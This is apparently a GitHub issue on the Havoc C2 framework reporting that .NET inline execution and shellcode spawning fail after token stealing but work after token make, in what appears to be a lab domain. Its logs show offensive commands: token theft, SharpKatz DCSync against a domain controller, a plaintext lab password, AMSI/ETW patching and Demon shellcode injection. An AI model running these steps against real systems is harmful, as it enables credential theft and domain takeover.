[Teamserver-Client--Bug]: C# execution fails with user impersonation

[Anon-Exploiter]

Contact Details

No response

What happened?

The C# binary fails to execute if user impersonation is done.

If I do token steal pid and then run SharpKatz, it fails. However, when I revert, it works.

Did You Do a Pull First?

Latest (You performed a pull first)

Did You Try With the Dev Branch?

Yes

Relevant log output

[11:31:01] [DBUG] [agent.(*Agent).TaskDispatch:4276]: Agent: 4051e778, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_STEAL, User: NORTH\robb.stark, TokenID: 2, TargetPID: 1448
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:6384]: Agent: 4051e778, Command: COMMAND_MEM_FILE, Success: 1, MemFileID: 5189ca26
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:4134]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_NET_VERSION
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:4174]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_FAILED
[11:31:13] [DBUG] [agent.(*Agent).TaskDispatch:4470]: Agent: 4051e778, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_REVERT, Successful: 1
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:6384]: Agent: 4051e778, Command: COMMAND_MEM_FILE, Success: 1, MemFileID: 22402a32
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:4134]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_NET_VERSION
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:3354]: Agent: 4051e778, Command: COMMAND_OUTPUT, len: 709

Did You Read Over Your Issue First?

• I declare I made an effort and provided the necessary information for replication of the issue.

[Anon-Exploiter]

Tested some more, token make works fine, with token steal, it fails.

11/02/2025 12:05:19 [user0xff] Demon » token steal 5148
[*] [B60DE2F4] Tasked demon to steal a process token
[+] Send Task to Agent [24 bytes]
[+] Successful stole and impersonated token from 5148 User:[NORTH\robb.stark] TokenID:[1]

11/02/2025 12:05:21 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [754E9306] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [394 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

11/02/2025 12:05:27 [user0xff] Demon » token revert
[*] [64BC3857] Tasked demon to revert the process token
[+] Send Task to Agent [16 bytes]
[+] Successful reverted token to itself

11/02/2025 12:05:54 [user0xff] Demon » token make NORTH.SEVENKINGDOMS.LOCAL robb.stark sexywolfy
[*] [8F0BDC2E] Tasked demon to make a new network token for NORTH.SEVENKINGDOMS.LOCAL\robb.stark
[+] Send Task to Agent [126 bytes]
[+] Successfully created and impersonated token: NORTH.SEVENKINGDOMS.LOCAL\robb.stark

11/02/2025 12:06:01 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [3F19ADC7] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [396 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[+] Received Output [774 bytes]:
[*]
[*] 			System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT                                                  |
[*] ----------------------------------------------------------------------
[*] | Major: 10            | Minor: 0             | Build: 17763         |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0                           |
[*] ----------------------------------------------------------------------
[*]
[!] NORTH.SEVENKINGDOMS.LOCAL will be the domain
[!] winterfell.NORTH.SEVENKINGDOMS.LOCAL will be the DC server
[*] Output file will be C:\Windows\TEMP\10022025170604.txt
[*] Replication data exported

Also

11/02/2025 12:10:25 [user0xff] Demon » token impersonate 4
[*] [F59A0672] Tasked demon to impersonate a process token
[+] Send Task to Agent [20 bytes]
[+] Successful impersonated 

11/02/2025 12:10:29 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [F41AD92E] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [396 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

11/02/2025 12:10:37 [user0xff] Demon » token list
[*] [0FC52D6B] Tasked demon to list token vault
[+] Send Task to Agent [16 bytes]
[*] Token Vault:

  ID   Handle  Domain\User                           PID   Type           Impersonating
 ----  ------  -----------                           ---   -------------- -------------
 0     0x6d4   NORTH\robb.stark                      5756  stolen         No  
 1     0xb2c   NORTH\robb.stark                      5148  stolen         No  
 2     0xbe8   NORTH.SEVENKINGDOMS.LOCAL\robb.stark  5232  make (local)   No  
 3     0xbe4   NORTH\robb.stark                      5756  stolen         No  
 4     0x23c   NORTH\robb.stark                      940   stolen         Yes 

[Anon-Exploiter]

Additionally, I can't spawn a new shell using the impersonated token either. I just have to use token make, without it, it would not work.

# Does not work
token steal 824
shellcode spawn x64 /home/kali/OSEP/hav0c/demon.x64.bin


# Works 
token make NORTH.SEVENKINGDOMS.LOCAL robb.stark sexywolfy
shellcode spawn x64 /home/kali/OSEP/hav0c/demon.x64.bin

[12:19:22] [DBUG] [agent.(*Agent).TaskDispatch:4250]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_IMPERSONATE, Successful: 1, User: 
[12:19:22] [DBUG] [agent.(*Agent).TaskDispatch:6426]: Agent: 19969c22, 1 bytes were left unread
[12:19:28] [DBUG] [agent.(*Agent).TaskDispatch:3623]: Agent: 19969c22, Command: COMMAND_INJECT_SHELLCODE, Status: 0
[12:19:37] [DBUG] [agent.(*Agent).TaskDispatch:4470]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_REVERT, Successful: 1
[12:19:52] [DBUG] [agent.(*Agent).TaskDispatch:4250]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_IMPERSONATE, Successful: 1, User: 
[12:19:52] [DBUG] [agent.(*Agent).TaskDispatch:6426]: Agent: 19969c22, 1 bytes were left unread
[12:20:02] [DBUG] [agent.(*Agent).TaskDispatch:3623]: Agent: 19969c22, Command: COMMAND_INJECT_SHELLCODE, Status: 0
[12:20:05] [DBUG] [handlers.handleDemonAgent:262]: Agent does not exists. hope this is a register request
[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:404]: Parsed DemonID: 5a2fae98
[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:412]: AgentID (5a2fae98) == DemonID (5a2fae98)

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:424]: 
Hostname: CASTELBLACK
Username: SYSTEM
Domain  : north.sevenkingdoms.local
InternIP: 192.168.30.142
ExternIP: 192.168.56.22

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:441]: 
ProcessName : C:\Windows\System32\notepad.exe
ProcessPID  : 6208
ProcessTID  : 5412
ProcessPPID : 0
ProcessArch : 2
Elevated    : 1
Base Address: 0x21b58170000

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:459]: 
SleepDelay  : 0
SleepJitter : 15

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:594]: Finished parsing demon
[12:20:05] [DBUG] [packer.(*Packer).Build:87]: No Aes Key specified
[12:20:05] [DBUG] [handlers.handleDemonAgent:295]: Finished request

[Anon-Exploiter]

Same within the dev branch.